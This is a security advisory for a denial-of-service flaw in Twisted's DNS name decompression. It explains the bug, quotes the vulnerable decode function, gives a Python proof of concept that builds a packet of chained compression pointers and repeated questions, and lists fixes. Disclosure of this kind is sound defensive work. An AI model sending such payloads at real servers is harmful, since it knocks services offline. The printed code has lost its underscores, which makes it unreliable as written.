CVE-2026-42304

CVSS v3.1

7.5

High

Vector

AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Details

The twisted.names module is vulnerable to a Denial of Service (DoS) attack via resource exhaustion during DNS name decompression. A remote, unauthenticated attacker can exploit this by sending a crafted TCP DNS packet containing deeply chained compression pointers. This flaw bypasses previous loop-prevention logic, causing the single-threaded Twisted reactor to hang while processing millions of recursive lookups, effectively freezing the server.

Technical Details

The main issue is in twisted.names.dns.Name.decode. A visited set was added in 2011 (commit e11cd82) to prevent infinite loops, but there is still no limit on the number of pointer dereferences per message. Also, the visited set is reset for each Question record.

Because DNSServerFactory handles every record in QDCOUNT without checking them, an attacker can add thousands of questions that all refer to the same long chain of pointers. This makes the parser repeat a complex and unnecessary search.

## src/twisted/names/dns.py (Lines 595-631)

def decode(self, strio, length=None):
    visited = set()
    self.name = b""
    off = 0
    while 1:
      l = ord(readPrecisely(strio, 1))
      if l == 0:
        if off > 0:
          strio.seek(off)
        return
      if (l >> 6) == 3:
        new off = (l & 63) << 8 | ord(readPrecisely(strio, 1))
        if new off in visited:
          raise ValueError("Compression loop in encoded name")
        visited.add(new off)
        if off == 0:
          off = strio.tell()
        strio.seek(new off)
        continue
      label = readPrecisely(strio, l)
      if self.name == b"":
        self.name = label
      else:
        self.name = self.name + b"." + label

PoC

import struct, time
from twisted.names import dns, server
from twisted.test import proto helpers

def create tcp payload():
  num pointers = 8000
  packet length = 65533
  num questions = (packet length - (num pointers * 2) - 12) // 6

  buffer = bytearray(packet length)

  struct.pack into("!HHHHHH", buffer, 0, 1, 0, num questions, 0, 0, 0)

  ptr offset = 12
  for  in range(num pointers - 1):
    struct.pack into("!H", buffer, ptr offset, 0xC000 | (ptr offset + 2))
    ptr offset += 2

  null byte offset = ptr offset + 2
  struct.pack into("!H", buffer, ptr offset, 0xC000 | null byte offset)
  buffer[null byte offset] = 0

  question offset = null byte offset + 1
  for  in range(num questions):
    if question offset + 6 <= packet length:
      struct.pack into("!HHH", buffer, question offset, 0xC000 | 12, 1, 1)
      question offset += 6

  return packet length, num pointers, num questions, struct.pack("!H", packet length) + buffer

def test dns server():
  factory = server.DNSServerFactory(clients=[])
  protocol = factory.buildProtocol(("127.0.0.1", 10053))
  transport = proto helpers.StringTransport()
  protocol.makeConnection(transport)

  pkt len, num ptrs, num qs, payload = create tcp payload()
  print("payload")
  print(f"len={pkt len} ptrs={num ptrs} qs={num qs}")

  start = time.time()
  protocol.dataReceived(payload)
  end = time.time()

  print(f"time={end - start:.4f}s")

if  name  == " main ":
  test dns server()

Impact

A single malformed TCP packet is sufficient to block the Twisted reactor's event loop for several seconds. Because Twisted operates on a single-threaded cooperative multitasking model, this is a common Denial of Service (DoS). The process becomes unable to handle new connections, process I/O, or respond to existing requests, effectively paralyzing the server for the duration of the decompression.

Remediation

Update twisted.names.dns.Name.decode to add a required limit on pointer resolutions per DNS message
Share the "resolved offset" state across all records in a single message to prevent redundant processing.
Validate the number of questions before entering the decoding loop in Message.decode.